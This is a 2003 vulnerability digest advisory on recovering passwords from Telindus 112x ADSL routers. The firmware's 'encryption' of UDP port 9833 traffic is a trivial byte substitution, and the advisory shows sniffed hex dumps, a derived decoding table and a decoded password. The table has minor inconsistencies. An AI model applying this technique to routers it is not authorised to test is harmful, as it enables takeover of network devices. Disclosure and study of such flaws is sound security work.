24th Feb 2003 [SBWID-6014]
COMMAND
	Telindus password recovery due to weak encryption scheme
SYSTEMS AFFECTED
	Telindus ADSL router 112x, firmware release 6.0.x
PROBLEM
	In  Elia   Florio   "ioProgrammo"   [http://www.edmaster.it/ioprogrammo]
	[[email protected]] advisory :
	An old security problem for Telindus 112x  series  (and  Arescom  NetDSL
	1000 too) is well documented here:
	
	 http://www.tigerteam.it/files/telindus-advisory.txt       (english)
	 http://www.tigerteam.it/files/telindus-advisory.IT.txt    (italian)
	
	There is a new exploit to  crack  router  password,  partially-based  on
	this old  problem,  which  was  fixed  by  Telindus  introducing  a  new
	firmware release (6.0.x), where UDP packets over 9833  port  (containing
	plain-text password) are encrypted, to ensure product security.
	However, after some studies, I discovered that the encryption scheme  is
	trivial and can be  broken  using  some  information  which  the  router
	itself reveals (the router name) to the user.
	NOTE: The encryption scheme  was  succesfully  decrypted  on  2  routers
	carried by different ISP : MATAV (Hungary)  and  Telecom  (Italy),  both
	with 6.0.x firmware.
	 [---------------------------------------------------------------------]
	PROOF OF CONCEPT:
	Using a sniffer I capture a packet (encrypted) from a  1124  router  and
	compare it with another packet (unencrypted) taken from another  router,
	with has the old firmware (< 6.0.x). This procedure  (how-to-capture-
	packet) was explained in a previous security advisory  (by  others)  and
	is based on UDP sniffing over the 9833  port  while  "Telindus  9100  M.
	Application" is trying to contact the router over the LAN.
	
	                            CYPHER-TEXT
	0100  00 03 02 00 08 00 00 A2 A3 2B 63 4B 73 23 AB 99    .......��+cKs#�TM
	0110  02 0A 22 9A 61 02 93 7B AB A3 2B 90 08 08 00 2B    .."sa."{��+�...+
	0120  6B 7B AB 9B 28 08 10 01 92 72 22 99 89 91 B1 82    k{�>(...'r"TM`�,
	0130  42 29 6A A2 62 49 61 03 B3 2B 91 01 B1 71 81 71    B)j�bIa.�+`.�q�q
	0140  91 B9 DA A3 AB 29 02 53 AB 61 01 99 81 01 89 C9    `�ڣ�).S�a.TM�.�
	0150  D1 89 B1 D1 99 B1 01 91 81 81 90 09 98 00 10 01    ѱ�TM�.`���.~...
	0160  E0 08 98 00 30 00 2E C0 9F 0A 88 08 B0 00 30 00    �.~.0..�Y.^.�.0.
	0170  85 38 9A 64 0A 00 18 00 10 00 02 00 20 00 10 00    ...8sd........ ..
	0180  00 09 30 00 00 09 38 00 00 09 40 00 00 09 80 00    ..0...8...@....
	0190  10 00 10 0A 20 00 00 08 20 00 10 00 00 10 50 00    .... ... .....P.
	01A0  10 00 00 0A 30 00 10 00 00 0A 48 00 20 00 00 00    ....0.....H. ...
	01B0  00 0A 88 00 02 10 28 00 02 11 10 00 00 20 40 00    ..^...(...... @.
	                            PLAIN-TEXT
	0100  00 03 00 01 01 00 00 05-44 53 4C 30 30 01 01 00   ........DSL00...
	0110  0D 31 31 31 31 31 31 31-31 31 31 31 31 31 01 02   .1111111111111..
	0120  00 32 4E 44 31 30 36 30-56 45 2D 54 4C 49 2C 20   .2ND1060VE-TLI,
	0130  76 65 72 20 35 2E 33 2E-31 31 42 3B 54 68 75 20   ver 5.3.11B;Thu
	0140  44 65 63 20 20 36 20 31-36 3A 33 36 3A 33 33 20   Dec  6 16:36:33
	0150  32 30 30 31 01 33 00 02-00 3C 01 13 00 06 00 60   2001.3...<.....`
	0160  6C 1D BD 7E 01 16 00 06-00 00 86 60 62 F7 04 08   l..~.......`b...
	0170  00 02 00 01 04 15 00 02-00 FF 01 0D 00 04 00 00   ................
	0180  00 00 01 0E 00 04 00 00-00 00 01 14 00 02 00 00   ................
	0190  40 03 00 02 00 00 40 04-00 02 00 00 01 26 00 00   @.....@......&..
	01A0  01 27 00 00 01 28 00 00-01 30 00 02 00 02 01 44   .'...(...0.....D
	01B0  00 00 42 05 00 00 42 22-00 00 04 18 00 00 08 FF   ..B...B"........
	
	Both payloads begin with "00 03 xx xx xx 00 00" bytes sequence.
	In the plain packet we can read the router name and  the  password:  the
	beginning of a text string has  an  important  byte,  which  stores  the
	string length:
	
	05-44 53 4C 30 30 01 01 00
	^^----------------------------------> lenght of string "DSL00"
	0D 31 31 31 31 31 31 31-31 31 31 31 31 31 01 02 00
	^^----------------------------------> lenght of string "1111111111111"
	
	I suppose that "0x  0x  00"  is  a  kind  of  termination  sequence  for
	<router name> and <password> fields.
	Now look at the encrypted packet: because the total  length  is  similar
	to that of the plain packet (>200 bytes), I suppose that "A2" is  now  a
	crypted lenght byte, so the router name field begins after this byte.
	But I know the router name, because Telindus 9100 M.  Application  shows
	it to me during the connection test with router. In  this  case  it  was
	"Telindus ADSL Router",very long! I think that  is  enough  to  begin  a
	crypto-analytic attack over the packet.
	"Telindus ADSL Router" [20 byte = 14hex]  crypto-lenght=A2
	
	T  e  l  i  n  d  u  s     A  D  S  L     R  o  u  t  e  r 
	A3 2B 63 4B 73 23 AB 99 02 0A 22 9A 61 02 93 7B AB A3 2B 90  encrypted
	54 65 6C 69 6E 64 75 73 20 41 44 53 4C 20 52 6F 75 74 65 72  plain ASCII
	
	Looking this, I try to suppose that:
	1) the encryption scheme is based on a fixed crypto system
	   ("e", "u", "t" are encrypted in same way in the text)
	2) there is a special encryption for stop/mark bytes between
	   words (add -2 or -3 to final char R=93 / r=90 ????)
	3) the encryption scheme is case sensitive
	Trying to write a crypto table, I can notice that every letter is  coded
	from the previous adding "8" to  crypto-byte.  For  example  r=93,  then
	s=9B...
	
	CRYPTO TABLE (hex codes)
	-------------------------------------
	CHAR    CRYPT    PLAIN
	a       0B       61
	b       13       62
	c       1B       63
	d       23       64
	e       2B       65
	f       33       66
	g       3B       67
	h       43       68
	i       4B       69
	j       53       6A
	k       5B       6B
	l       63       6C
	m       6B       6D
	n       73       6E
	o       7B       6F
	p       83       70
	q       8B       71
	r       93       72
	s       9B       73
	t       A3       74
	u       AB       75
	v       B3       76
	w       BB       77
	y       C3       78
	x       CB       79
	z       D3       7A
	... 
	1       89       31
	2       91       32
	3       98       33
	...
	
	I think that the encryption function is very similar to this :
	
	ENCRYPT(x) = x*8 + int(x/20h) - (int(x/20h))*100h
	
	For example ("q" = 71h)
	
	ENCRYPT(71h) = 71h*8 + 71h/20h - (71h/20H)*100H = 388 + 3 - 300 = 8Bh
	
	There are some encryption variants for  blank  space,  capital  and  the
	last letters of words.
	Now, where is the router password in  the  encrypted  packet?  After  20
	bytes (the router name length  in  this  case)  there  is  "08  08  00",
	probably a field marker, then there is 2B, which is  the  crypto-lentgth
	of password.
	The encrypted password-string begins there.
	Using the table, I can unmask the real router password:
	
	   m  o  u  s  e  
	2B 6B 7B AB 9B 28 08 10 01 
	^^----------------------------------crypto length of password
	
	Other informations can be also decrypted :
	
	N  D  S  1  2  6  0  H  E  -  T  L  I
	72 22 99 89 91 B1 82 42 29 6A A2 62 49 61 03 
	v  e  r     6  .  0  .  2  7     T  u  e     J  u  l     3  0     
	B3 2B 91 01 B1 71 81 71 91 B9 DA A3 AB 29 02 53 AB 61 01 99 81 01 
	1  9  :  1  6  :  3  6     2  0  0  2
	89 C9 D1 89 B1 D1 99 B1 01 91 81 81 90 09 98 00 10 01
	
	 [----------------------------------------------------------------------]
SOLUTION
	n/a